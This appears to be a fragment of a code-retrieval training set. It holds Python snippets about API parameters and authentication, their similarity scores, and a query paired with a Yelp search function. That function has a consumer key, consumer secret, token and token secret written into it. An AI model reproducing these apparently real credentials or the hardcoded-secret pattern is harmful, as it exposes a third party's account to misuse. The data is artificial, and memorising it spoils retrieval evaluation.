"def set_parameters(self, population_size=40, num_tests=5, num_searches=5, num_enabled=17, bonus1=10, bonus2=1,\n **kwargs):\n kwargs.pop('num_searches_best', None)\n super().set_parameters(num_searches_best=0, local_searches=(mts_ls1v1, mts_ls2), **kwargs)",
"def set_params(self, w, b):\n self.w = w\n self.b = b\n return",
"def handle_post_start (self):\n\n request = ExampleHttpRequest(self, \"search.yahoo.com\")\n\n request.set_parameter(\"p\", \"python elements\")\n request.set_parameter(\"toggle\", \"1\")\n request.set_parameter(\"cop\", \"mss\")\n request.set_parameter(\"ei\", \"UTF-8\")\n request.set_parameter(\"fr\", \"yfp-t-892\")\n\n request.open(\"/search\")",
"def __init__(self, apiKey, apiSecret):\n self.apiKey = apiKey\n self.apiSecret = apiSecret",
"def manage_params(args):\n # Socrata API\n with open(\"secret/builtby-socrata.yaml\", 'r') as f:\n try:\n socrata_api_credentials = yaml.load(f)\n except yaml.YAMLError as exc:\n print(exc)\n\n socrata_app_token = socrata_api_credentials['app_token']\n\n # base params\n params = {\n '$$app_token': socrata_app_token\n }\n # remove null attributes\n args = {k: v for k, v in args.items() if v is not None}\n # add args to params\n params.update(args) # inplace\n\n return params",
"def _build_params(self, location, username, **kwargs):\n return {\n 'q': location,\n 'fuzzy': kwargs.get('fuzzy', 0.8),\n 'username': username,\n 'maxRows': kwargs.get('maxRows', 1),\n }",
"def __init__(self):\n super().__init__()\n self._api_url = API_BASE_URL\n self._api_params = API_BASE_PARAMS.copy()",
"def prep_latlng_params(self, lat, lng):\n self._api_params['latlng'] = '{},{}'.format(lat, lng)",
"def setup(self, request_params):\n raise NotImplementedError(\n u\"%s: Method not implemented\", self.__class__.__name__)",
"def set(self, **kwargs):\n for key in kwargs:\n if key in self.bool_params:\n self.bool_params[key] = kwargs[key]\n elif key in self.int_params:\n self.int_params[key] = kwargs[key]\n elif key in self.str_params:\n self.str_params[key] = kwargs[key]\n elif key in self.float_params:\n self.float_params[key] = kwargs[key]\n else:\n raise RuntimeError('MOPAC calculator: unknown keyword: ' + key)",
"def set_api_access_keys(**kwargs):\n API_BASE_PARAMS['key'] = kwargs['key']",
"def _FillInCommonOauthParams(self, params):\n\n params['oauth_consumer_key'] = self.key\n params['oauth_nonce'] = str(random.randrange(2**64 - 1))\n params['oauth_signature_method'] = 'HMAC-SHA1'\n params['oauth_version'] = '1.0'\n params['oauth_timestamp'] = str(int(time.time()))",
"def _folium_kwargs(self):",
"def set_parameters(self,params):\n K3Supervisor.set_parameters(self,params)\n self.gtg.set_parameters(self.parameters)\n self.avoidobstacles.set_parameters(self.parameters)\n self.wall.set_parameters(self.parameters)",
"def __init__(self):\n\n self.base_url = 'https://apartments.jsmliving.com/'\n self.base_url_apartments = self.base_url + \"apartments/\"\n self.start_url = self.base_url_apartments + \"?availability=37\"\n self.apartment_urls = []\n self.apartment_data = []",
"def set_search_parameters(self, config):\n for k, v in config.items():\n self.config[k] = v",
"def setParams(self, disable=False):\n if hasattr(self, \"_input_kwargs\"):\n kwargs = self._input_kwargs\n else:\n kwargs = self.__init__._input_kwargs\n return self._set(**kwargs)",
"def __init__(self, api_key=None, secret_key=None, headers=None):\n # set up base requester\n self._base_requester = Requester(API_ENDPOINT, api_key=api_key, secret_key=secret_key, headers=headers)\n # add each endpoint\n self.geocode = self.Geocode(self._base_requester)\n self.places = self.Places(self._base_requester)",
"def set_param(self,set_dict):\n if self.query_running():\n self.params_pending = True\n self.pending_params = set_dict\n return \"Pending\"\n for param in set_dict:\n root={\"EXP\":self.app,\"DM\":self.appdoc}[param.split(\"_\")[0]]\n root.SetParam(win32com.client.constants.__dicts__[0][param],set_dict[param])\n rootd={\"EXP\":self.app_param,\"DM\":self.appdoc_param}[param.split(\"_\")[0]]\n rootd.update({param:root.GetParam(win32com.client.constants.__dicts__[0][param])[0]})\n return \"Updated\"",
"def set_params(self, params):\n for item in params:\n if len(item.split(\"-\")) == 6:\n self.params[item.split(\"-\")[-1]] = params[item]\n elif item.split(\"-\")[5] == \"BECKE88\":\n self.becke88.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"BECKE88_LR\":\n self.becke88_lr.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"BECKE88_LR_ADIABATIC\":\n self.becke88_lr_adiabatic.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"BECKE97\":\n self.becke97.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"BECKE_ROUSSEL\":\n self.becke_roussel.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"BEEF\":\n self.beef.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"CS1\":\n self.cs1.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"GV09\":\n self.gv09.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"HCTH\":\n self.hcth.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"KE_GGA\":\n self.ke_gga.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"KE_LIBXC\":\n self.ke_libxc.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"LDA_HOLE_T_C_LR\":\n self.lda_hole_t_c_lr.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"LIBXC\":\n self.libxc.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"LYP\":\n self.lyp.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"LYP_ADIABATIC\":\n self.lyp_adiabatic.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"OPTX\":\n self.optx.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"P86C\":\n self.p86c.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"PADE\":\n self.pade.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"PBE\":\n self.pbe.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"PBE_HOLE_T_C_LR\":\n self.pbe_hole_t_c_lr.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"PW92\":\n self.pw92.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"PZ81\":\n self.pz81.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"TF\":\n self.tf.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"TFW\":\n self.tfw.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"TPSS\":\n self.tpss.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"VWN\":\n self.vwn.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"XALPHA\":\n self.xalpha.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"XGGA\":\n self.xgga.set_params({item: params[item]})\n elif item.split(\"-\")[5] == \"XWPBE\":\n self.xwpbe.set_params({item: params[item]})\n else:\n pass",
"def set_params(self, params):\n for item in params:\n if len(item.split(\"-\")) == 5:\n self.params[item.split(\"-\")[-1]] = params[item]\n elif item.split(\"-\")[4] == \"BECKE88\":\n self.becke88.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"BECKE88_LR\":\n self.becke88_lr.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"BECKE88_LR_ADIABATIC\":\n self.becke88_lr_adiabatic.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"BECKE97\":\n self.becke97.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"BECKE_ROUSSEL\":\n self.becke_roussel.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"BEEF\":\n self.beef.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"CS1\":\n self.cs1.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"GV09\":\n self.gv09.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"HCTH\":\n self.hcth.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"KE_GGA\":\n self.ke_gga.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"KE_LIBXC\":\n self.ke_libxc.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"LDA_HOLE_T_C_LR\":\n self.lda_hole_t_c_lr.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"LIBXC\":\n self.libxc.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"LYP\":\n self.lyp.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"LYP_ADIABATIC\":\n self.lyp_adiabatic.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"OPTX\":\n self.optx.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"P86C\":\n self.p86c.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"PADE\":\n self.pade.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"PBE\":\n self.pbe.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"PBE_HOLE_T_C_LR\":\n self.pbe_hole_t_c_lr.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"PW92\":\n self.pw92.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"PZ81\":\n self.pz81.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"TF\":\n self.tf.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"TFW\":\n self.tfw.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"TPSS\":\n self.tpss.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"VWN\":\n self.vwn.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"XALPHA\":\n self.xalpha.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"XGGA\":\n self.xgga.set_params({item: params[item]})\n elif item.split(\"-\")[4] == \"XWPBE\":\n self.xwpbe.set_params({item: params[item]})\n else:\n pass",
"def parameters(self):",
"def set_params(self, **params):\n if not params:\n # Simple optimization to gain speed (inspect is slow)\n return self\n else:\n self.kwargs.update(params)\n\n return self",
"def initialize_survey(self, **kwargs):",
"def set_params(self, **params):\n return self.forest.set_params(**params)",
"def _set_parameters(self, *path_params, **query_params):\n\n # take timeout\n try:\n self._timeout = int(query_params.get(\n constants.RequestConst.TIMEOUT, self._timeout\n ))\n except ValueError:\n pass\n try:\n del query_params[constants.RequestConst.TIMEOUT]\n except KeyError:\n pass\n\n # set default API call params\n for key, value in self.default_parameters.items():\n self.parameters[constants.RequestConst.QUERY][key] = value\n\n _query_params = self.query_parameters.get_params()\n\n # set API call params defined during the \"call\" invocation\n for key, value in query_params.items():\n if value is None:\n continue\n\n if key in _query_params.values():\n self.parameters[constants.RequestConst.QUERY][key] = value\n\n elif key in _query_params.keys():\n self.parameters[\n constants.RequestConst.QUERY\n ][_query_params[key]] = value\n\n if self.method == constants.RequestConst.GET:\n # transform all True and False param to 1 and 0\n for key, value in self.parameters[\n constants.RequestConst.QUERY\n ].items():\n if value is True:\n self.parameters[constants.RequestConst.QUERY][key] = \\\n constants.BoolConst.TRUE\n if value is False:\n self.parameters[constants.RequestConst.QUERY][key] = \\\n constants.BoolConst.FALSE\n\n # set optional url path params\n for value in path_params:\n self.parameters[constants.RequestConst.PATH].append(value)",
"def __init__(self):\n self._params = None",
"def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"Rdy[1.,0.0,10.0]\");\n self.modelBuilder.doVar(\"Rbk[1.,0.0,10.0]\");\n self.modelBuilder.doVar(\"Rqcd_emu[1,0.0,10.0]\");\n self.modelBuilder.doSet(\"POI\",\"Rbk,Rdy,Rqcd_emu\")",
"def set_parameters(self, **kwargs):\n self.__multi_layer_perceptron.set_params(**kwargs)",
"def get_params(self):\n return self.params\n\n \"\"\"\n ____________________________________________________________________________\n\n Fields retrieved from search by default\n ---------------------------------------\n 'id': True,\n 'title': True,\n 'agency' : True,\n 'awardeeCity' : True,\n 'awardeeName' : True,\n 'awardeeStateCode' : True,\n 'date' : True,\n 'fundsObligatedAmt' : True,\n 'piFirstName' : True,\n 'piLastName' : True,\n\n Other retrievable fields\n ------------------------\n 'offset' : False\n 'awardeeCountryCode' : False,\n 'awardeeCounty' : False,\n 'awardeeDistrictCode' : False,\n 'awardeeZipCode' : False,\n 'cfdaNumber' : False,\n 'coPDPI' : False,\n 'startDate' : False,\n 'expDate' : False,\n 'estimatedTotalAmt' : False,\n 'fundsObligatedAmt' : True,\n 'dunsNumber' : False,\n 'fundProgramName' : False,\n 'parentDunsNumber' : False,\n 'pdPIName' : False,\n 'perfCity' : False,\n 'perfCountryCode' : False,\n 'perfCounty' : False,\n 'perfDistrictCode' : False,\n 'perfLocation' : False,\n 'perfStateCode' : False,\n 'perfZipCode' : False,\n 'poName' : False,\n 'primaryProgram' : False,\n 'transType' : False,\n 'awardee' : False,\n 'poPhone' : False,\n 'poEmail' : False,\n 'awardeeAddress' : False,\n 'perfAddress' : False,\n 'publicationResearch' : False,\n 'publicationConference' : False,\n 'fundAgencyCode' : False,\n 'awardAgencyCode' : False,\n 'projectOutComesReport' : False,\n 'abstractText' : False,\n 'piMiddeInitial' : False,\n 'piLastName' : True,\n 'piPhone' : False,\n 'piEmail' : False\n \"\"\"",
"def updateParameters(self, parameters):\r\n return"
] | [
"0.64296603",
"0.621526",
"0.61677766",
"0.6114416",
"0.59252185",
"0.5825301",
"0.5812804",
"0.5749866",
"0.57189363",
"0.5699997",
"0.56947994",
"0.5644126",
"0.56365013",
"0.56365013",
"0.56365013",
"0.56365013",
"0.56365013",
"0.5616667",
"0.5610575",
"0.5582047",
"0.55815303",
"0.557732",
"0.5560208",
"0.55590016",
"0.55509347",
"0.5540958",
"0.5502522",
"0.5495415",
"0.5480501",
"0.54764104",
"0.5474993",
"0.5470682",
"0.5465878",
"0.54424816",
"0.5440057",
"0.5406234",
"0.5337285",
"0.53184634",
"0.5317401",
"0.5313916",
"0.53062123",
"0.5304556",
"0.52939403",
"0.5261542",
"0.52577704",
"0.52275634",
"0.5225014",
"0.52093315",
"0.5205563",
"0.5205563",
"0.5189188",
"0.517505",
"0.51645774",
"0.51606816",
"0.51588666",
"0.51564246",
"0.5146203",
"0.5144623",
"0.5131748",
"0.51092476",
"0.5102404",
"0.509417",
"0.5087315",
"0.5086968",
"0.508514",
"0.5082248",
"0.50795877",
"0.50756896",
"0.50661343",
"0.5063605",
"0.50603855",
"0.505574",
"0.5054781",
"0.5048",
"0.5041805",
"0.50380445",
"0.50355464",
"0.5030583",
"0.5029587",
"0.5021807",
"0.50187016",
"0.50183207",
"0.49992892",
"0.49981442",
"0.49933824",
"0.4985326",
"0.49826014",
"0.4973048",
"0.4971605",
"0.49629048",
"0.4962741",
"0.4960407",
"0.49600947",
"0.49580318",
"0.495465",
"0.4946785",
"0.4945497",
"0.49454838",
"0.49441236",
"0.49413955",
"0.4936432"
] | 0.0 | -1 |
API keys, session authentication | def api_connect(self, params):
consumer_key = "XwD3f3Yoe2GcjqXSd5kRkA"
consumer_secret = "VtZMCNmBNEardBkIXo-RU7De-wU"
token = "JymbFW3SgkWemf6aTEHUvsNoPg9Nh7hZ"
token_secret = "S4XUSKiIcUCYnlC3q7FYgUC47co"
session = rauth.OAuth1Session(consumer_key = consumer_key,
consumer_secret = consumer_secret,
access_token = token,
access_token_secret = token_secret,
)
request = session.get("http://api.yelp.com/v2/search",params=params)
data = request.json()
session.close()
return data | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def api_authentication():\r\n apikey = request.args.get('api_key', None)\r\n from flask import _request_ctx_stack\r\n if 'Authorization' in request.headers:\r\n apikey = request.headers.get('Authorization')\r\n if apikey:\r\n user = db.session.query(model.user.User).filter_by(api_key=apikey).first()\r\n ## HACK:\r\n # login_user sets a session cookie which we really don't want.\r\n # login_user(user)\r\n if user:\r\n _request_ctx_stack.top.user = user",
"def auth(self):\n return self.api(self.token)",
"def api_key(request):\r\n user_acct = request.user\r\n return _api_response(request, {\r\n 'api_key': user_acct.api_key,\r\n 'username': user_acct.username\r\n })",
"def _get_api_key(self):\n self.api.apikey = self.api.action.user_show(id=self.username)['apikey']",
"def login_to_apic(self):\n session = Session(URL, LOGIN, PASSWORD)\n resp = session.login()\n self.assertTrue(resp.ok)\n return session",
"def __init__(self, api_key: str):\n self.session: requests.Session = requests.Session()\n self.session.headers.update({'Authorization': api_key})",
"def set_api_key(self, api_key):\n self.api_key = api_key\n self.session.auth = (\"api\", api_key)",
"def login(api_key, secret_key):\n update_session(\"X-GEMINI-APIKEY\", api_key)\n set_secret_key(secret_key.encode())\n set_login_state(True)",
"def test_get_user_api_keys(self):\n pass",
"def __init__(self):\n self.authurl = Config().auth\n self.baseurl = Config().api\n self.s = Session()\n self.s.headers = {'Accept': 'application/json'}\n data = {\"grant_type\": \"client_credentials\", \"scope\": \"/read-public\", \"client_id\": Config().client_id,\n \"client_secret\": Config().client_secret}\n r = self.s.request(method=\"post\", url=self.authurl, data=data)\n self.s.headers = {'Accept': 'application/json', \"Access token\": r.json()[\"access_token\"]}",
"def authenticate(self):\n expires = int(time.time())\n method = \"GET\"\n path = \"/realtime\"\n msg = method + path + str(expires)\n signature = hmac.new(\n self.secret, msg.encode(), digestmod=hashlib.sha256\n ).hexdigest()\n\n req = {\"op\": \"authKey\", \"args\": [self.key, expires, signature]}\n self.send_packet(req)",
"def login_to_api(self):\n\n # set the API endpoint and POST the username/password to it\n endpoint = app.config['API']['url'] + 'login'\n response = requests.post(\n endpoint,\n verify = app.config['API']['verify_ssl'],\n json = {\n 'username': self.username,\n 'password': self.password\n }\n )\n\n # if the response is good, return True\n if response.status_code == 200:\n user = response.json()\n self._id = ObjectId(user['_id'])\n self.token = user['access_token']\n return True",
"def init_api():\n global soundcloud\n import json\n \n SECRETS_VERSION = 1\n \n # Load secrets file\n if os.path.exists(config.token_cache):\n with open(config.token_cache, 'r', encoding='utf-8') as f:\n secrets = json.load(f)\n else:\n secrets = {}\n \n # Try to reuse the cached access token\n if secrets\\\n and secrets['version'] == SECRETS_VERSION\\\n and secrets['access_token_acquired_at'] + secrets['access_token_expires_in'] > time() - 5 * 60\\\n and secrets['username'] == config.username:\n \n soundcloud = Soundcloud(\n client_id=config.client_id,\n client_secret=config.client_secret,\n access_token=secrets['access_token']\n )\n return\n \n # Get a new access token\n logging.info('Getting a new access token') \n try:\n soundcloud = Soundcloud(\n client_id=config.client_id,\n client_secret=config.client_secret,\n username=config.username,\n password=config.password\n )\n except HTTPError as e:\n if e.response.status_code == 401:\n logging.critical('Incorrect API key, login or password. Please, edit config.py.')\n sys.exit(1)\n else:\n raise\n \n # Save the token\n secrets = {\n 'version': SECRETS_VERSION,\n 'username': config.username,\n 'access_token': soundcloud.access_token,\n 'access_token_acquired_at': time(),\n 'access_token_expires_in': soundcloud.token.expires_in,\n }\n \n with open(config.token_cache, 'w', encoding='utf-8') as f:\n secrets = json.dump(secrets, f, indent='\\t', ensure_ascii=False)",
"def authenticate( self ):\n\n print(\"Getting new token\")\n self.getFrob()\n self.getAuthKey()\n self.getToken()\n self.cacheToken()",
"def get_or_create_sessions(self):\n\t\tpath = f'{self.BIKE_ENDPOINT}user/current/session?{self.secret_key}'\n\t\tresponse = requests.get(path).json()\n\t\tself.check_api_key(response)\n\n\t\treturn response",
"def get_auth():\n config = configparser.RawConfigParser()\n config.read(\"speech.cfg\")\n apikey = config.get('auth', 'apikey')\n return (\"apikey\", apikey)",
"def mbta_session() -> BaseUrlSession:\n cfg = config()\n session = BaseUrlSession(cfg.api_root)\n if cfg.api_key:\n session.headers.update({\"x-api-key\": cfg.api_key})\n return session",
"def api_keys(self) -> dict:\n return self.AUTH.get_api_keys()",
"def get_auth(self):\n # Only return accepted keys from the auth_keys dictionary\n # This is to prevent exceptions thrown from keystone session\n returnDict = {}\n for key in self.creds:\n if key in self.auth_keys[self.api_version]:\n returnDict[key] = self.creds[key]\n return returnDict",
"def __init__(self, api_key=None):\n self.session = Session()\n if api_key:\n self.session.headers.update({\n 'X-API-Key': api_key,\n })\n self._load_apis()",
"def _v2_auth(self, url):\n return {\"auth\": {\n \"passwordCredentials\": {\"username\": self.user,\n \"password\": self.secret}}}",
"def basic_authentication(self, username: str, password: str) -> None:\n self.api_session.auth = (username, password)",
"def _authenticate(self, reqs, session=None):\n if not isinstance(reqs[0], dict):\n raise TypeError('The input \"req\" is not typeof dict.')\n if not isinstance(reqs[1], dict):\n raise TypeError('The input \"req\" is not typeof dict.')\n\n auth_response = {}\n req = reqs[0]\n cacert = req.get('cacert')\n endpoint_type = req.get('endpoint_type', 'publicURL')\n insecure = req.get('insecure')\n mistral_url = req.get('mistral_url')\n region_name = req.get('region_name')\n service_type = req.get('service_type', 'workflowv2')\n\n verify = self._verification_needed(cacert, insecure)\n\n if not session:\n auth = self._get_auth(**req)\n\n if auth:\n session = ks_session.Session(auth=auth, verify=verify)\n\n if session:\n if not mistral_url:\n try:\n mistral_url = session.get_endpoint(\n service_type=service_type,\n interface=endpoint_type,\n region_name=region_name\n )\n except Exception:\n mistral_url = None\n\n auth_response['mistral_url'] = mistral_url\n auth_response['session'] = session\n\n target_req = reqs[1]\n\n if \"auth_url\" in target_req:\n target_auth = self._get_auth(**target_req)\n\n if target_auth:\n\n # target cacert and insecure\n cacert = target_req.get('cacert')\n insecure = target_req.get('insecure')\n\n verify = self._verification_needed(cacert, insecure)\n\n target_session = ks_session.Session(\n auth=target_auth,\n verify=verify\n )\n\n target_auth_headers = target_session.get_auth_headers() or {}\n\n target_auth_token = target_auth_headers.get('X-Auth-Token')\n\n auth_response.update({\n api.TARGET_AUTH_TOKEN: target_auth_token,\n api.TARGET_PROJECT_ID: target_session.get_project_id(),\n api.TARGET_USER_ID: target_session.get_user_id(),\n api.TARGET_AUTH_URI: target_auth._plugin.auth_url,\n })\n\n access = target_auth.get_access(target_session)\n service_catalog = access.service_catalog\n\n if self._is_service_catalog_v2(service_catalog):\n access_data = access._data[\"access\"]\n if not len(access_data['serviceCatalog']):\n LOG.warning(\n \"Service Catalog empty, some authentication\"\n \"credentials may be missing. This can cause\"\n \"malfunction in the Mistral action executions.\")\n sc_json = jsonutils.dumps(access_data)\n auth_response[api.TARGET_SERVICE_CATALOG] = sc_json\n\n if not auth_response:\n LOG.debug(\"No valid token or password + user provided. \"\n \"Continuing without authentication\")\n return {}\n\n return auth_response",
"async def _authenticate(self, conn: AsyncConnection):\n # Docs: https://www.bitmex.com/app/apiKeys\n # https://github.com/BitMEX/sample-market-maker/blob/master/test/websocket-apikey-auth-test.py\n if self.key_id and self.key_secret:\n LOG.info('%s: Authenticate with signature', conn.uuid)\n expires = int(time.time()) + 365 * 24 * 3600 # One year\n msg = f'GET/realtime{expires}'.encode('utf-8')\n signature = hmac.new(self.key_secret.encode('utf-8'), msg, digestmod=hashlib.sha256).hexdigest()\n await conn.write(json.dumps({'op': 'authKeyExpires', 'args': [self.key_id, expires, signature]}))",
"def login(self):\n base_url = 'https://accounts.pixiv.net/login'\n login_url = 'https://accounts.pixiv.net/api/login'\n post_key_html = self.session.get(base_url, headers = self.headers, proxies = self.proxies).text\n post_key_soup = BeautifulSoup(post_key_html, 'lxml')\n post_key = post_key_soup.find('input', {'name': 'post_key'})['value']\n data = {\n 'pixiv_id': self.config['email'],\n 'password': self.config['password'],\n 'post_key': post_key\n }\n self.session.post(login_url, data = data, headers = self.headers, proxies = self.proxies)",
"def authenticate(self,keys=None):\n\n # if we have just been handed keys, stash them in self\n if keys:\n self.appID = keys['appID']\n self.mac_key_id = keys['mac_key_id']\n self.mac_key = keys['mac_key']\n debugMain('authenticate: ok, thanks for supplying keys')\n return keys\n\n # if we already have keys, we don't need to do anything.\n if self.isAuthenticated():\n debugMain('authenticate: we already have keys! doing nothing.')\n return\n\n # first, register with the server to get temp keys:\n # self.appID and self.mac_*\n # this also makes a new self.session which uses MAC authentication\n self._register()\n\n debugMain('authenticate: converting temp keys into permanent keys')\n\n # send user to the tent.is url to grant access\n # we will get the \"code\" in response\n self.state = randomString()\n params = {\n 'client_id': self.appID,\n 'redirect_uri': self.oauthCallbackUrl,\n 'state': self.state,\n 'scope': ','.join(self.scopes.keys()),\n 'tent_profile_info_types': 'all',\n 'tent_post_types': 'all',\n }\n if self.postNotificationUrl:\n params['tent_notification_url'] = self.postNotificationUrl\n requestUrl = self.apiRootUrls[0] + '/oauth/authorize'\n urlWithParams = requestUrl + '?' + urlencode(params)\n\n print '---------------------------------------------------------\\\\'\n print\n print 'Opening web browser so you can grant access on your tent server.'\n print\n print 'URL: %s'%urlWithParams\n print\n print 'After you grant access, your browser will be redirected to'\n print 'a nonexistant page. Look in the url and find the \"code\"'\n print 'parameter. Paste it here:'\n print\n print 'Example:'\n print 'http://zzzzexample.com/oauthcallback?code=15673b7718651a4dd53dc7defc88759e&state=ahyKV...'\n print ' ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^'\n print\n webbrowser.open(urlWithParams)\n code = raw_input('> ')\n print\n print '---------------------------------------------------------/'\n\n # trade the code for a permanent key\n # first make the auth headers using the credentials from the registration step\n resource = '/apps/%s/authorizations'%self.appID\n jsonPayload = {'code':code, 'token_type':'mac'}\n\n # then construct and send the request\n debugDetail()\n headers = dict(DEFAULT_HEADERS)\n headers['Content-Type'] = 'application/vnd.tent.v0+json'\n requestUrl = self.apiRootUrls[0] + resource\n debugRequest('posting to: %s'%requestUrl)\n r = retry(self.session.post, requestUrl, data=json.dumps(jsonPayload), headers=headers)\n\n # display our request\n debugDetail('request headers:')\n debugJson(r.request.headers)\n debugDetail('request data:')\n debugDetail(r.request.data)\n\n # then get the response\n debugDetail()\n debugDetail('response headers:')\n debugJson(r.headers)\n debugDetail('response text:')\n debugRaw(r.text)\n if not r.json:\n debugDetail()\n debugError('auth failed.')\n return\n debugJson(r.json)\n\n # now we have permanent keys\n self.mac_key_id = r.json['access_token'].encode('utf-8')\n self.mac_key = r.json['mac_key'].encode('utf-8')\n debugDetail('final mac key id: %s'%self.mac_key_id)\n debugDetail('final mac key: %s'%self.mac_key)\n\n # return the keys\n return {\n 'appID': self.appID,\n 'mac_key_id': self.mac_key_id,\n 'mac_key': self.mac_key,\n }",
"def auth_token(self):",
"def _authenticate(self):\n url = self.endpoint + \"/tokens\"\n h = httplib2.Http()\n response, rawcontent = h.request(\n url, \n method=\"POST\",\n headers={ \"Content-Type\":\"application/json\" },\n body=json.dumps(self.credentials()))\n content = json.loads(rawcontent)\n self.token = content['access']['token']['id']\n #TODO: this needs to convert the ISO8601 string to a timestamp\n self.expiration = content['access']['token']['expires']\n self.catalog = content['access']['serviceCatalog']",
"def _auth(self):\n url = 'https://forsight.crimsonhexagon.com/api/authenticate?'\n\n payload = {\n 'username': self.username,\n 'password': self.password\n }\n\n r = self.session.get(url, params=payload)\n j_result = r.json()\n self.auth_token = j_result[\"auth\"]\n #print('-- Crimson Hexagon Authenticated --')\n return",
"def authentication(): \n pathToConfig = os.path.join(prefix, \"twitterConfig\")\n config = json.load(open(pathToConfig))\n consumer_key = config['consumer_key']\n consumer_secret = config['consumer_secret']\n access_token = config['access_token']\n access_token_secret = config['access_token_secret']\n api = twitter.Api(consumer_key=consumer_key, consumer_secret=consumer_secret,\n access_token_key=access_token, access_token_secret=access_token_secret)\n return api",
"def __init__(self, key_id: str, user: str, password: str):\n\n self.key_id = key_id\n self.user = user\n self.password = password\n self.con_strategy = \"unknown\"\n self.session = requests.Session()\n self.session.auth = (user, password)\n self.__fields = None\n if self.key_id == \"localhost\":\n self.local_ip_list = \"127.0.0.1\"\n self.local_ip = \"127.0.0.1\"\n self.port = \"52199\"\n self.con_strategy = \"local\"",
"def authenticate(self, api_key):\n self.headers['x-rapidapi-key'] = api_key",
"def authenticate(self):\n token = self.get_config('token')\n if token:\n self.root.connection.login(\n None, None, token=token, auth_type='Bearer'\n )\n else:\n config.use_sessions = True\n self.root.load_session().get()",
"def skyserv_authenticator(self):\n \n header = {\n 'Content-Type': accept, \n 'X-Auth-Token': self.casjobtoken,\n 'Accept': accept\n }\n # this format is disgusting but required....\n authdata = {\n 'auth' :{\n 'identity': {\n 'password': {\n 'user': {\n 'name': username,\n 'password': password\n }\n }\n }\n }\n }\n payload = json.dumps(authdata).encode(encoding='utf-8')\n try:\n post = requests.post(self.loginurl, data=payload, headers=header)\n\n if post.status_code == 200:\n response = json.loads(post.text)\n token = response[self.tokenkey]\n return token\n else:\n print('Username and/or password are invalid.')\n post.raise_for_status()\n except Exception as e:\n raise(str(e))",
"def __init__(self):\n self.base_url = credentials.api['base_url']\n self.config_path = credentials.api['config_path']\n self.group_base = credentials.api['group_base']\n self.session = requests.session()\n self.uidaruba = self.login()",
"def get_api_keys(owner):\n api.get_all(owner)",
"def authenticate():\n\n # We are uploading and then downloading so we want Musicmanager\n api = Musicmanager()\n\n # Attempt to authenticate and log in\n logged_in = api.login()\n\n # If login() returns false, you have not performed oauth yet, or did not\n # write your credentials to your disk. Using oauth allows authentication\n # without providing plaintext credentials to the application\n if not logged_in:\n print('No oauth credentials found, please authenticate your account')\n\n # Performs oauth and stores generated credentials to Appdirs \n # 'user_data_dir' by default. oauth only needs to be performed once per \n # machine if the credentials are stored, which is the default behavior.\n authenticated = api.perform_oauth(open_browser=True)\n else:\n print('Successfully logged in.\\n')\n\n return api",
"def login(username, password, store=True):\r\n url = '{}/login'.format(USGS_API_ENDPOINT)\r\n payload = {\r\n \"jsonRequest\": payloads.login(username, password)\r\n }\r\n logger.debug(\"API call URL: {}\".format(url))\r\n logger.debug(\"API call payload hidden.\")\r\n resp = requests.post(url,payload)\r\n if resp.status_code is not 200:\r\n raise USGSError(resp.text)\r\n response = resp.json()\r\n logger.debug(\"Received response:\\n{}\".format(json.dumps(response, indent=4)))\r\n apiKey = response[\"data\"]\r\n\r\n if apiKey is None:\r\n raise USGSError(response[\"error\"])\r\n \r\n if store:\r\n logger.debug(\"Writing API key to file {}\".format(KEY_FILE))\r\n with open(KEY_FILE, \"w\") as f:\r\n f.write(apiKey)\r\n \r\n return response",
